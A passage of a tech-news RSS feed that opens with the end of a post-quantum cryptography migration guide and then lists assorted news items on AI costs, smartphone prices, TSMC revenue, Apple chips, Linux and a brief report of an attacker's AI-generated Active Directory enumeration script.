  However, a sufficiently powerful and fault-tolerant quantum computer could
  theoretically use <strong><a href="https://quantum.cloud.ibm.com/docs/en/tutorials/shors-algorithm" target="_blank">Shor's algorithm</a></strong> to undermine widely used
  public key algorithms, including:
</span></p>

<ul>
  <li><span>RSA</span></li>
  <li><span>Elliptic Curve Cryptography, or ECC</span></li>
  <li><span>Diffie-Hellman key exchange</span></li>
  <li><span>Elliptic Curve Diffie-Hellman</span></li>
</ul>

<p><span>
  That does not mean organisations should panic. It does mean they should begin
  preparing before such capability exists.
</span></p>

<h2><span>Post-Quantum Cryptography Is Already Here</span></h2>

<p><span>
  The transition towards quantum-resistant cryptography is already under way.
</span></p>

<p><span>
  In August 2024, the
  <a href="https://www.nist.gov/pqc" rel="noopener noreferrer" target="_blank">
    <strong>U.S. National Institute of Standards and Technology</strong>
  </a>
  published its first three finalised Post-Quantum Cryptography standards.
</span></p>

<ul>
  <li>
    <span><a href="https://csrc.nist.gov/pubs/fips/203/final" rel="noopener noreferrer" target="_blank">
      <strong>FIPS 203: ML-KEM</strong>
    </a>
    for establishing shared secret keys.
  </span></li>
  <li>
    <span><a href="https://csrc.nist.gov/pubs/fips/204/final" rel="noopener noreferrer" target="_blank">
      <strong>FIPS 204: ML-DSA</strong>
    </a>
    for digital signatures.
  </span></li>
  <li>
    <span><a href="https://csrc.nist.gov/pubs/fips/205/final" rel="noopener noreferrer" target="_blank">
      <strong>FIPS 205: SLH-DSA</strong>
    </a>
    for stateless hash-based digital signatures.
  </span></li>
</ul>

<p><span>
  These standards give governments, technology providers and organisations a
  foundation for moving towards cryptographic methods designed to resist both
  conventional and quantum-enabled attacks.
</span></p>

<h2><span>The Risk Is Not Only in the Future</span></h2>

<p><span>
  One important concern is sometimes described as
  <strong>harvest now, decrypt later</strong>.
</span></p>

<p><span>
  An attacker may collect encrypted information today in the hope of decrypting
  it in the future, once more capable quantum technology becomes available.
</span></p>

<p><span>
  This matters most where information must remain confidential for many years,
  such as:
</span></p>

<ul>
  <li><span>Government and defence information</span></li>
  <li><span>Intellectual property and trade secrets</span></li>
  <li><span>Long-term commercial agreements</span></li>
  <li><span>Personal, medical or financial records</span></li>
  <li><span>Critical infrastructure designs</span></li>
  <li><span>Authentication and identity information</span></li>
</ul>

<p><span>
  The urgency of <b>Post-Quantum Cryptography (PQC) </b>planning should therefore be based
  not only on when a cryptographically relevant quantum computer may arrive,
  but also on how long an organisation's data must remain protected.
</span></p>

<h2><span>What Should Organisations Be Doing Today?</span></h2>

<p><span>
  For most organisations, the first challenge is not selecting a new algorithm.
  It is understanding where cryptography is already being used.
</span></p>

<p><span>
  Cryptographic dependencies may be embedded within applications, network
  protocols, certificates, hardware, cloud services, APIs, supplier products
  and legacy systems.
</span></p>

<p><span>
  You cannot migrate what you have not identified.
</span></p>

<h3><span>1. Build a cryptographic inventory</span></h3>

<p><span>
  Identify where encryption, digital signatures, certificates, key exchange
  mechanisms and cryptographic libraries are used.
</span></p>

<p><span>The inventory should cover:</span></p>

<ul>
  <li><span>Applications and databases</span></li>
  <li><span>Web services and APIs</span></li>
  <li><span>TLS certificates</span></li>
  <li><span>VPNs and remote-access technologies</span></li>
  <li><span>Identity and authentication platforms</span></li>
  <li><span>Code-signing and software-update processes</span></li>
  <li><span>Hardware security modules</span></li>
  <li><span>Cloud services</span></li>
  <li><span>Third-party and supplier solutions</span></li>
  <li><span>Operational technology and embedded devices</span></li>
</ul>

<h3><span>2. Identify quantum-vulnerable algorithms</span></h3>

<p><span>
  Determine where RSA, ECC, Diffie-Hellman and related public key algorithms
  are used.
</span></p>

<p><span>
  Do not assume that a certificate-management database alone provides a
  complete view. Cryptography may also be hard-coded into applications,
  libraries, firmware and external services.
</span></p>

<h3><span>3. Map cryptography to business services</span></h3>

<p><span>
  A technical inventory is useful, but it becomes more valuable when linked to
  critical business services.
</span></p>

<p><span>Organisations should understand:</span></p>

<ul>
  <li><span>Which important services depend on vulnerable cryptography</span></li>
  <li><span>What information those services protect</span></li>
  <li><span>How long that information must remain confidential</span></li>
  <li><span>What would happen if the cryptography could no longer be trusted</span></li>
  <li><span>Which suppliers or platforms must be upgraded first</span></li>
</ul>

<h3><span>4. Design for cryptographic agility</span></h3>

<p>
  <span><strong>Cryptographic agility</strong> is the ability to replace algorithms,
  protocols, certificates and keys without rebuilding an entire system.
</span></p>

<p><span>
  New systems should avoid unnecessary dependencies on a single algorithm or
  cryptographic implementation. Cryptographic choices should be configurable,
  documented and capable of being updated as standards and threats evolve.
</span></p>

<h3><span>5. Engage suppliers</span></h3>

<p><span>
  Organisations depend heavily on software vendors, cloud providers, network
  suppliers and managed service providers.
</span></p>

<p><span>Useful questions include:</span></p>

<ul>
  <li><span>Where does your product use RSA, ECC or Diffie-Hellman?</span></li>
  <li><span>Do you maintain a cryptographic bill of materials?</span></li>
  <li><span>What is your roadmap for supporting NIST PQC standards?</span></li>
  <li><span>Will customers need new hardware or software?</span></li>
  <li><span>Will hybrid classical and post-quantum modes be supported?</span></li>
  <li><span>How will certificates, keys and protocols be migrated?</span></li>
  <li><span>What testing has been completed for performance and interoperability?</span></li>
</ul>

<h3><span>6. Test before large-scale migration</span></h3>

<p><span>
  Post-quantum algorithms can have different key sizes, signature sizes,
  processing requirements and network implications.
</span></p>

<p><span>
  Organisations should test their effect on applications, protocols, devices
  and infrastructure before committing to widespread deployment.
</span></p>

<h3><span>7. Establish governance and ownership</span></h3>

<p><span>
  PQC migration is not solely a security engineering problem. It may require
  coordination across:
</span></p>

<ul>
  <li><span>Cybersecurity</span></li>
  <li><span>Enterprise architecture</span></li>
  <li><span>Infrastructure and cloud teams</span></li>
  <li><span>Application development</span></li>
  <li><span>Procurement</span></li>
  <li><span>Legal and privacy teams</span></li>
  <li><span>Risk and compliance</span></li>
  <li><span>Business service owners</span></li>
</ul>

<p><span>
  Clear ownership, funding, milestones and reporting will be essential for what
  is likely to become a multi-year transformation programme.
</span></p>

<h2><span>A Practical Post-Quantum Cryptography Roadmap</span></h2>

<p><span>A proportionate roadmap could follow four stages.</span></p>

<h3><span>Discover</span></h3>

<ul>
  <li><span>Build the cryptographic inventory</span></li>
  <li><span>Identify vulnerable algorithms</span></li>
  <li><span>Map dependencies to critical services</span></li>
  <li><span>Assess long-term confidentiality requirements</span></li>
</ul>

<h3><span>Prioritise</span></h3>

<ul>
  <li><span>Rank systems by business criticality and data sensitivity</span></li>
  <li><span>Identify difficult-to-replace legacy technology</span></li>
  <li><span>Assess supplier readiness</span></li>
  <li><span>Determine where harvest-now-decrypt-later risk is greatest</span></li>
</ul>

<h3><span>Prepare</span></h3>

<ul>
  <li><span>Introduce cryptographic agility requirements</span></li>
  <li><span>Update procurement and architecture standards</span></li>
  <li><span>Establish governance and ownership</span></li>
  <li><span>Begin laboratory testing and controlled pilots</span></li>
</ul>

<h3><span>Migrate and validate</span></h3>

<ul>
  <li><span>Deploy approved algorithms using a risk-based sequence</span></li>
  <li><span>Validate interoperability and performance</span></li>
  <li><span>Retire vulnerable cryptographic dependencies</span></li>
  <li><span>Collect evidence that migration has been completed successfully</span></li>
</ul>

<h2><span>Final Thoughts</span></h2>

<p><span>
  Standing in front of IBM Quantum System One was a fascinating reminder that
  the future often arrives quietly.
</span></p>

<p><span>
  Today's immediate cybersecurity priorities remain ransomware, identity
  compromise, supply chain risk, exposed services and weak security controls.
  Quantum computing does not replace those priorities.
</span></p>

<p><span>
  However, responsible security leadership also means recognising risks that
  require years of preparation.
</span></p>

<p><span>
  Quantum computing is no longer confined entirely to theoretical research.
  Developers and researchers can already access real quantum processors through
  services such as the IBM Quantum Platform.
</span></p>

<p><span>
  That does not mean organisations need to rush into an uncontrolled migration.
  It means they should begin understanding their exposure, improving
  cryptographic agility and establishing a structured roadmap.
</span></p>

<p><span>
  The organisations that start mapping their cryptographic landscape today
  will be better prepared when quantum-safe migration becomes a business
  requirement rather than a future consideration.
</span></p>

<hr>

<h2><span>Useful Resources</span></h2>

<ul>
  <li>
    <span><a href="https://quantum.ibm.com/" rel="noopener noreferrer" target="_blank">
      IBM Quantum Platform
    </a>
  </span></li>
  <li>
    <span><a href="https://www.ibm.com/quantum" rel="noopener noreferrer" target="_blank">
      IBM Quantum
    </a>
  </span></li>
  <li>
    <span><a href="https://www.nist.gov/pqc" rel="noopener noreferrer" target="_blank">
      NIST Post-Quantum Cryptography Project
    </a>
  </span></li>
  <li>
    <span><a href="https://csrc.nist.gov/pubs/fips/203/final" rel="noopener noreferrer" target="_blank">
      NIST FIPS 203: ML-KEM
    </a>
  </span></li>
  <li>
    <span><a href="https://csrc.nist.gov/pubs/fips/204/final" rel="noopener noreferrer" target="_blank">
      NIST FIPS 204: ML-DSA
    </a>
  </span></li>
  <li>
    <span><a href="https://csrc.nist.gov/pubs/fips/205/final" rel="noopener noreferrer" target="_blank">
      NIST FIPS 205: SLH-DSA</a></span></li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[The price is wrong: AI cost calculation has to consider task completion rates, not just token costs]]></title>
<description><![CDATA[Cheap can be expensive]]></description>
<link>https://tsecurity.de/de/3666398/it-nachrichten/the-price-is-wrong-ai-cost-calculation-has-to-consider-task-completion-rates-not-just-token-costs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666398/it-nachrichten/the-price-is-wrong-ai-cost-calculation-has-to-consider-task-completion-rates-not-just-token-costs/</guid>
<pubDate>Mon, 13 Jul 2026 22:32:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cheap can be expensive]]></content:encoded>
</item>
<item>
<title><![CDATA[AI is killing low cost smartphones]]></title>
<description><![CDATA[Except for the second user/refurbished smartphone markets, AI means the days of cheap phones are over, with huge price pressures putting low-end vendors out of business. 



Omdia data confirms that Apple and Samsung are undisputed kings of the hill, combining for 42% of the market even as smartp...]]></description>
<link>https://tsecurity.de/de/3666045/it-nachrichten/ai-is-killing-low-cost-smartphones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666045/it-nachrichten/ai-is-killing-low-cost-smartphones/</guid>
<pubDate>Mon, 13 Jul 2026 19:32:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Except for the second user/refurbished smartphone markets, AI means the days of cheap phones are over, with <a href="https://www.applemust.com/ram-ageddon-continues-samsung-eyes-another-20-dram-hike/" target="_blank" rel="noreferrer noopener">huge price pressures</a> putting low-end vendors out of business. </p>



<p class="wp-block-paragraph"><a href="https://omdia.tech.informa.com/pr/2026/july/global-smartphone-market-down-4-percent-in-2q26-while-apple-and-samsung-soared" target="_blank" rel="noreferrer noopener">Omdia data confirms</a> that Apple and Samsung are undisputed kings of the hill, combining for 42% of the market even as smartphone sales overall have seen a 4% average decline. </p>



<p class="wp-block-paragraph">The two companies increased market share by 4% (Apple) and 2% (Samsung) compared with 2Q25. Meanwhile, the situation is becoming much worse for smaller vendors as memory prices spiral, leaving their businesses under immense strain. Data from <a href="https://counterpointresearch.com/en/insights/global-smartphone-shipments-q2-2026" target="_blank" rel="noreferrer noopener">Counterpoint Research</a> tells a similar story, indicating Apple growth against a background of market decline. </p>



<p class="wp-block-paragraph">It’s important to put the impact of raised RAM costs into perspective. While Apple and Samsung make products at the kind of scale that enables them to cut better deals, smaller makers don’t have the same advantage, leaving them far more exposed to memory price driven pressures.  </p>



<h2 class="wp-block-heading"><strong>Memory prices are crushing the low end</strong></h2>



<p class="wp-block-paragraph">And they really are exposed; not only are sales declining, but Omdia analyst Runar Bjorhovde notes that vendors at that end of the market are <a href="https://www.linkedin.com/posts/runar-bjorhovde_omdias-q2-2026-preliminary-smartphone-report-activity-7482426036731871232-LB76?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAAAAkqmgBwAoPK9FIf-gJ43wlJtmVMSHGAio" data-type="link" data-id="https://www.linkedin.com/posts/runar-bjorhovde_omdias-q2-2026-preliminary-smartphone-report-activity-7482426036731871232-LB76?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAAAAkqmgBwAoPK9FIf-gJ43wlJtmVMSHGAio" target="_blank" rel="noreferrer noopener">dealing with hugely destructive DRAM price hikes</a> over just the past year — up to four or five times higher in some cases. That degree of increase is the kind of business-focused tsunami that drives people out of the market altogether and certainly leaves companies exposed to M&amp;A activity.</p>



<p class="wp-block-paragraph">Right now, memory and storage can account for more than 60% of the product cost, Bjorhovde said. And as costs continue to increase, what profitability that does exist in the low-cost, high competition lower end smartphone space is being utterly mauled. Omdia forecasts a 22% decline in the sub-$400 smartphone segment as a result.</p>



<p class="wp-block-paragraph">“Samsung Electronics and Apple — the two market leaders — made huge market share gains…, whereas most players beyond went through steep volume declines,” Bjorhovde said.</p>



<h2 class="wp-block-heading"><strong>From volume to value</strong></h2>



<p class="wp-block-paragraph">Apple’s decision to expand its addressable market with the iPhone ‘e’ series just adds pressure, while Samsung’s enduring popularity helps make it difficult for smaller vendors to generate profit through market scale. “To adapt, vendors are shifting their strategies from volume to value by reoptimizing portfolios and adjusting retail pricing,” he said. </p>



<p class="wp-block-paragraph">“Although memory and storage costs are the biggest challenges for vendors, they are far from the only challenge,” Bjorhovde said. “New semiconductor bottlenecks, such as within foundries, are adding further cost pressures.”</p>



<p class="wp-block-paragraph">With the cost of manufacturing set to continue to rise, it’s generally accepted that we’ll see the average selling price of smartphones climb in the coming 12 months, with Apple set to lead the market toward higher cost builds with the new Pro and Ultra iPhones this September.</p>



<p class="wp-block-paragraph">Apple’s decision to hold smartphone prices so far has added another price pressure to low-end vendors; the longer it holds its prices down, the longer and more painful will smaller vendors hang onto their own low-price structure to compete.</p>



<h2 class="wp-block-heading"><strong>Future shock: AI hardware</strong></h2>



<p class="wp-block-paragraph">A further wild card is in <a href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html">Apple’s recent lawsuit against OpenAI</a>, which accuses the ChatGPT maker of “illegal reliance on misappropriated trade secrets” in its hardware plans. OpenAI is thought to be planning an AI-driven iPhone competitor.</p>



<p class="wp-block-paragraph">We’ve heard speculation about these plans before, of course. But what seems to be emerging in the wake of Apple’s litigation are hints OpenAI intends to introduce its first <a href="https://www.macrumors.com/2026/02/20/jony-ive-openai-smart-speaker-2027/" target="_blank" rel="noreferrer noopener">AI hardware product</a> at some point in 2027.</p>



<p class="wp-block-paragraph">Assuming that schedule remains on track, OpenAI will likely impose further component pricing pressure across the whole industry. After all, Apple’s customer loyalty leads the industry, and Samsung has built something similar. So, the companies with the most to lose to OpenAI will be the same set of smaller vendors who are already struggling with component price-driven market complexity.</p>



<p class="wp-block-paragraph">OpenAI products will demand the same memory, similar processors, manufacturing, and other components as other devices, prompting further pricing pressure. That’s likely to put some small vendors out of business entirely, even as standard smartphone prices increase. </p>



<h2 class="wp-block-heading"><strong>Fragmentation will be next</strong></h2>



<p class="wp-block-paragraph">Those outcomes won’t be universal, as the desire for <a href="https://theconversation.com/europe-wants-to-end-its-dangerous-reliance-on-us-internet-technology-274042" target="_blank" rel="noreferrer noopener">sovereign data services</a> and <a href="https://www.politico.eu/article/4-ways-europe-wants-to-wean-off-us-tech/" target="_blank" rel="noreferrer noopener">growing mistrust of US tech companies</a> suggest OpenAI’s products might see limited adoption in most markets. But they could serve to accelerate divergence in smartphone purchasing patterns worldwide, while adding to market pressure.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social">BlueSky</a>, <a href="http://www.linkedin.com/in/jonnyevans">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans">Mastodon</a>, and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Attacker Uses Suspected AI-Generated PowerShell Script to Map Active Directory]]></title>
<description><![CDATA[Cybersecurity researchers have flagged an intrusion in which an unknown threat actor leveraged a vibe-coded PowerShell script for Active Directory (AD) enumeration.

"The script looked for the Domain Controller (DC) and mapped users, computers, and domains, before creating a directory and exporti...]]></description>
<link>https://tsecurity.de/de/3665257/it-security-nachrichten/attacker-uses-suspected-ai-generated-powershell-script-to-map-active-directory/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665257/it-security-nachrichten/attacker-uses-suspected-ai-generated-powershell-script-to-map-active-directory/</guid>
<pubDate>Mon, 13 Jul 2026 14:39:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have flagged an intrusion in which an unknown threat actor leveraged a vibe-coded PowerShell script for Active Directory (AD) enumeration.

"The script looked for the Domain Controller (DC) and mapped users, computers, and domains, before creating a directory and exporting out a number of files, and finally creating AD_Report.html to measure the success of the]]></content:encoded>
</item>
<item>
<title><![CDATA[Attacker Uses Suspected AI-Generated PowerShell Script to Map Active Directory]]></title>
<description><![CDATA[Cybersecurity researchers have flagged an intrusion in which an unknown threat actor leveraged a vibe-coded PowerShell script for Active Directory (AD) enumeration. “The script looked for the Domain Controller (DC) and mapped users, computers, and domains, before creating a directory…
Read more →...]]></description>
<link>https://tsecurity.de/de/3665240/it-security-nachrichten/attacker-uses-suspected-ai-generated-powershell-script-to-map-active-directory/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665240/it-security-nachrichten/attacker-uses-suspected-ai-generated-powershell-script-to-map-active-directory/</guid>
<pubDate>Mon, 13 Jul 2026 14:39:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity researchers have flagged an intrusion in which an unknown threat actor leveraged a vibe-coded PowerShell script for Active Directory (AD) enumeration. “The script looked for the Domain Controller (DC) and mapped users, computers, and domains, before creating a directory…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/attacker-uses-suspected-ai-generated-powershell-script-to-map-active-directory/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/attacker-uses-suspected-ai-generated-powershell-script-to-map-active-directory/">Attacker Uses Suspected AI-Generated PowerShell Script to Map Active Directory</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[It’s the perfect time of year for grabbing a cheap radio for the garden, and they don’t come much cuter, more packed with features or wallet-friendly than this]]></title>
<description><![CDATA[The Majority Mini Shelford is a compact, cheap, portable radio with screen that goes on sale in August.]]></description>
<link>https://tsecurity.de/de/3665063/it-nachrichten/its-the-perfect-time-of-year-for-grabbing-a-cheap-radio-for-the-garden-and-they-dont-come-much-cuter-more-packed-with-features-or-wallet-friendly-than-this/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665063/it-nachrichten/its-the-perfect-time-of-year-for-grabbing-a-cheap-radio-for-the-garden-and-they-dont-come-much-cuter-more-packed-with-features-or-wallet-friendly-than-this/</guid>
<pubDate>Mon, 13 Jul 2026 13:18:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Majority Mini Shelford is a compact, cheap, portable radio with screen that goes on sale in August.]]></content:encoded>
</item>
<item>
<title><![CDATA[TSMC Posts 68 Percent June Revenue Jump Driven By Heavy AI Demand]]></title>
<description><![CDATA[TSMC, the biggest contract chipmaker in the world, just shared its June financial numbers, and the results easily beat market expectations. The company reported a massive 68 percent jump in revenue compared to the same month last year, reaching roughly 442 billion New Taiwan dollars.



This rapi...]]></description>
<link>https://tsecurity.de/de/3664835/ios-mac-os/tsmc-posts-68-percent-june-revenue-jump-driven-by-heavy-ai-demand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664835/ios-mac-os/tsmc-posts-68-percent-june-revenue-jump-driven-by-heavy-ai-demand/</guid>
<pubDate>Mon, 13 Jul 2026 11:55:23 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[TSMC, the biggest contract chipmaker in the world, just shared its June financial numbers, and the results easily beat market expectations. The company reported a massive 68 percent jump in revenue compared to the same month last year, reaching roughly 442 billion New Taiwan dollars.



This rapid growth highlights just how much tech companies need advanced artificial intelligence chips to power their latest software and hardware products. With major clients scaling up their operations, TSMC is seeing record demand for its manufacturing services.



Massive artificial intelligence chip demand fuels new revenue records



TSMC is clearly riding a massive wave of spending on artificial intelligence. The June revenue figure was not just a yearly increase. It also showed a 6 percent rise just from May. Over the first six months of the year, the chipmaker has pulled in about 2.4 trillion New Taiwan dollars, which is a 35 percent bump from the same period last year.



A lot of this money comes from its biggest partners. Tech giants like Nvidia, AMD, and Apple rely on TSMC to build the physical chips they design. Because everybody wants more computing power right now, the company has its hands full trying to make enough chips for all these brands.



To handle all these orders, the chipmaker is putting a lot of money into expanding its operations. It recently received the green light to spend 20 billion dollars on its factories in Arizona. This funding will go toward a new wafer plant and a packing facility in the United States. By growing its physical footprint, it hopes to catch up with the never-ending line of customers waiting for parts.



With the busy holiday season coming up and tech brands preparing to launch new smartphones and computers, the need for these small components will only grow. For now, TSMC is sitting in a very comfortable spot as the main builder of the artificial intelligence boom, turning massive hardware demand into record-breaking financial success.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Is Already Building The M8 Chip For Supreme AI Power]]></title>
<description><![CDATA[Apple is moving at breakneck speed to stay ahead in the tech race, and it is already looking far past its upcoming processors. According to Mark Gurman in his latest Power On newsletter for Bloomberg, the tech giant is currently designing the massive M8 chip. The new silicon will focus heavily on...]]></description>
<link>https://tsecurity.de/de/3664275/ios-mac-os/apple-is-already-building-the-m8-chip-for-supreme-ai-power/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664275/ios-mac-os/apple-is-already-building-the-m8-chip-for-supreme-ai-power/</guid>
<pubDate>Mon, 13 Jul 2026 07:24:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is moving at breakneck speed to stay ahead in the tech race, and it is already looking far past its upcoming processors. According to Mark Gurman in his latest Power On newsletter for Bloomberg, the tech giant is currently designing the massive M8 chip. The new silicon will focus heavily on artificial intelligence performance and extreme power savings for future computers and tablets.



The company jumps to a smaller 1.4nm technology for better efficiency



Reports show that the company is planning to build the M8 using an incredibly small 1.4-nanometer manufacturing process. The change will allow it to pack way more power into a tiny space while draining less battery life. This massive leap in efficiency is expected to arrive by 2028 when TSMC starts producing the new wafers. The new 1.4nm tech will not just be for computers, as the future iPhone models in 2028 will likely use it for the A22 Pro chip too.



The current roadmap shows that the brand is moving aggressively. We already know that Apple finalizes M7 chip design in record time to push AI limits because it wants to speed up hardware releases. This rapid pace also means that mid-tier chips are being skipped. For instance, Apple's M6 Pro and M6 Max may never launch as the company funnels all its resources into getting the next generations ready faster.



Future chips focus heavily on running massive smart tasks locally



Mark Gurman notes that the main reason for this rushed timeline is artificial intelligence. The upcoming processors are being designed from the ground up to handle intense local workloads. While the M7 will bring a huge memory upgrade, the M8 will take things to a completely different level with even greater capabilities. The company is reportedly working on a specific M8 processor codenamed Soko for 2028.



This huge push for memory and raw performance is clear across all product lines. For context, Apple's M7 Ultra could support up to 1.5TB of unified memory, which is double the capacity planned for the older M5 version.



By forcing its silicon team into overdrive, the tech giant is making sure its future machines will effortlessly run complex tasks without breaking a sweat. When these new processors finally arrive, buyers should see a massive jump in everyday speed and battery life.]]></content:encoded>
</item>
<item>
<title><![CDATA[Today I suddenly realized what a mad man I have become after 3 years of using Linux]]></title>
<description><![CDATA[So, let's roll back a few years ago. At that time I was starting to learn programming, and our family had friends (a couple) that actually were willing to teach me some stuff, I was excited because the husband, at that time, seemed to me like Gandalf, wanting to share his wisdom with me, a hobbit...]]></description>
<link>https://tsecurity.de/de/3664091/linux-tipps/today-i-suddenly-realized-what-a-mad-man-i-have-become-after-3-years-of-using-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664091/linux-tipps/today-i-suddenly-realized-what-a-mad-man-i-have-become-after-3-years-of-using-linux/</guid>
<pubDate>Mon, 13 Jul 2026 04:25:18 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>So, let's roll back a few years ago.</p> <p>At that time I was starting to learn programming, and our family had friends (a couple) that actually were willing to teach me some stuff, I was excited because the husband, at that time, seemed to me like Gandalf, wanting to share his wisdom with me, a hobbit that was living his normal life in the Shire (Windows).</p> <p>Alas, the classes did not last long, but one big thing that changed during that time period was my introduction to the wonderful world of Linux, and so, at last, my journey had begun.</p> <p>One must imagine how naive I was at the time, Ubuntu and Gnome were my friends with whom I fought battles side to side for quite a while. The dark terminal was scaring me, and I felt awkward using cd, ls, and even nano! But with time, my skills were sharpening, so as my tools. I began learning vim, using kitty instead of built in default terminal, and tiling window managers were beginning to appear at the horizon, I was learning.</p> <p>Fast moving forward, for the past 2 years at this point I have been using tiling window managers, split ortholinear ergo keyboard, configs are written by myself personally, I also have my personal nvim and vim setups, terminals etc. And recently I decided to take a look at the holy church of emacs (because that is what Gandalf the Gray said he used when I asked about his preference of choice in editors, I did not understand his choice at the time). One quick search introduced me to doom emacs (neat configuration that uses vim motions and is well put together already for you, like NVChad or LazyVim), I gave it a shot, and I loved it! But something felt wrong... And I knew exactly what: "It is not mine... I did not configure this, somebody else did and I am just sitting here and using it?". Well, yes, I made a decision to make my own configuration of emacs! And it seemed like a great opportunity to learn about it, what a great combo! (At this point you may already see how far gone I am)</p> <p>And so I have began diving in a rabbit hole after a rabbit hole, it is a never ending cycle that goes to this day. Fun fact: do you know what tree-sitter, that little program that gives you code highlighting actually is? Well, it is a parser generator, but have you ever wondered what a parser is and how it works? I am not going to answer those questions, you can research on your own, that is actually super cool!</p> <p>Back to the story. Today my friend (also in IT field but has a life) asked me what I was doing (I was learning what is an eshell (and what a shell is essentially)). Honestly, I don't know how to describe the emotions I felt at that moment... One hour later that felt like a minute, I told them all I knew about emacs, linux, and tried to give them a full understanding of how my computer works. Throughout this whole hour I was laughing hysterically at myself when trying to go deeper into the details because I realized how MAD it actually sounded to an outsider. Like have you ever tried to explain to your friend who is not really into computers and uses regular-ass IDE why lisp-interpreter might be one of the greatest things you have ever used? Or for example, why it is actually worth remembering potentially hundreds of keyboard shortcuts instead of "just clicking it with a mouse"? Oh man... and I feel like I am not even actually scratching the surface, I could go soo much deeper!</p> <p>Well anyway, I just felt like I needed to tell somebody that little story, thank you for being my readers :D</p> <p>Enjoy linux, stay fun and don't bully people ;D</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/My_never"> /u/My_never </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uuqxdu/today_i_suddenly_realized_what_a_mad_man_i_have/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uuqxdu/today_i_suddenly_realized_what_a_mad_man_i_have/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alpine Linux on any Single-Board Computers]]></title>
<description><![CDATA[submitted by    /u/ShyanJMC   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3664089/linux-tipps/alpine-linux-on-any-single-board-computers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664089/linux-tipps/alpine-linux-on-any-single-board-computers/</guid>
<pubDate>Mon, 13 Jul 2026 04:25:16 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/ShyanJMC"> /u/ShyanJMC </a> <br> <span><a href="https://www.reddit.com/r/AlpineLinux/comments/1uut8up/alpine_linux_on_any_singleboard_computers/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uuta4z/alpine_linux_on_any_singleboard_computers/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[DistroWatch Weekly, Issue 1181]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  This week in DistroWatch Weekly: 
Review: Artix 20260419
News: Google locking down Android, TUXEDO OS moving to a Debian foundation, Mint updates Cinnamon on Wayland, Redox OS gets USB gamepad support, OpenMandriva recovers from re...]]></description>
<link>https://tsecurity.de/de/3663997/unix-server/distrowatch-weekly-issue-1181/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663997/unix-server/distrowatch-weekly-issue-1181/</guid>
<pubDate>Mon, 13 Jul 2026 02:15:52 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  This week in DistroWatch Weekly: <br>
Review: Artix 20260419<br>
News: Google locking down Android, TUXEDO OS moving to a Debian foundation, Mint updates Cinnamon on Wayland, Redox OS gets USB gamepad support, OpenMandriva recovers from repository deletion, OSNews author compares Windows and Linux<br>
Questions and answers: Making migration to Linux easier<br>
Released....]]></content:encoded>
</item>
<item>
<title><![CDATA['The end of an era': China enforces mandatory rule to cull inefficient solar panels, signals end of ultra-cheap PV price wars]]></title>
<description><![CDATA[China introduces mandatory solar efficiency standards that could remove outdated factories, reduce oversupply, and reshape competition across the photovoltaic industry.]]></description>
